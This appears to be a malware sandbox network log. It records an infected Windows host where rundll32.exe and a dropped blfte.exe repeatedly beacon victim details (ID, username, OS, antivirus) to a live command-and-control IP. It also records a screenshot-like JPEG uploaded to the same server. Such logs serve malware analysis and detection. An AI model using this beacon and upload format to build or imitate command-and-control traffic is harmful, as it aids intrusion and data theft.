                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          26 | 192.168.2.4 | 49761 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:13.536020041 CEST | 4534 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          260 | 192.168.2.4 | 49906 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:52.164589882 CEST | 8014 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
261 | 176.111.174.114 | 80 | 192.168.2.4 | 49906 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:52.264585018 CEST | 8014 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:52 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
262 | 192.168.2.4 | 49907 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:52.467658043 CEST | 8028 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
263 | 176.111.174.114 | 80 | 192.168.2.4 | 49907 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:52.961832047 CEST | 8241 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:52 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
264 | 192.168.2.4 | 49908 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:53.538793087 CEST | 8241 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
265 | 176.111.174.114 | 80 | 192.168.2.4 | 49908 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:53.642342091 CEST | 8545 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:53 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
266 | 192.168.2.4 | 49910 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:53.854027033 CEST | 8546 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
267 | 176.111.174.114 | 80 | 192.168.2.4 | 49910 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:53.960473061 CEST | 8546 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:53 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
268 | 192.168.2.4 | 49911 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:54.178077936 CEST | 8547 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
269 | 176.111.174.114 | 80 | 192.168.2.4 | 49911 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:54.275764942 CEST | 8547 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:54 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 176.111.174.114 | 80 | 192.168.2.4 | 49761 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:13.637495041 CEST | 4534 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
270 | 192.168.2.4 | 49912 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:54.490307093 CEST | 8548 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
271 | 176.111.174.114 | 80 | 192.168.2.4 | 49912 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:54.588093042 CEST | 8548 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:54 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
272 | 192.168.2.4 | 49913 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:54.800630093 CEST | 8549 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
273 | 176.111.174.114 | 80 | 192.168.2.4 | 49913 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:54.900244951 CEST | 8549 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:54 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
274 | 192.168.2.4 | 49915 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:55.123074055 CEST | 8550 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
275 | 176.111.174.114 | 80 | 192.168.2.4 | 49915 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:55.230662107 CEST | 8551 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:55 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
276 | 192.168.2.4 | 49916 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:55.440531969 CEST | 8551 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
277 | 176.111.174.114 | 80 | 192.168.2.4 | 49916 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:55.539870024 CEST | 8552 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:55 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
278 | 192.168.2.4 | 49917 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:55.766356945 CEST | 9795 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
279 | 176.111.174.114 | 80 | 192.168.2.4 | 49917 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:55.873956919 CEST | 9958 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:55 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.4 | 49762 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:13.846182108 CEST | 4535 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
280 | 192.168.2.4 | 49918 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:56.080050945 CEST | 9959 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
281 | 176.111.174.114 | 80 | 192.168.2.4 | 49918 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:56.176745892 CEST | 9960 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:56 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
282 | 192.168.2.4 | 49919 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:56.382097006 CEST | 9973 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227495
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x 
?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc 